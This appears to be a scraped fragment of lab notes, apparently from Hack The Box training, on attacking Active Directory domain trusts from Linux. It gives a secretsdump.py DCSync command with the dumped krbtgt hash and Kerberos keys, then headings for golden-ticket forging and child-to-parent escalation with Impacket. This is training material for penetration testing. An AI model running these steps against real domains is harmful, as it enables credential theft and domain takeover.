π§Attacking Domain Trusts From Linux
Performing DCSync with secretsdump.py
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up...Performing SID Brute Force using lookupsid.py
Looking for the Domain SID
Grabbing the Domain SID & Attacking to Enterprise Admin's RID
Constructing a Golden Ticket using ticketer.py
Setting the KRB5CCNAME Env Variable
Getting a SYSTEM shell using Impacket
Performing the Attack with raiseChild.py
Last updated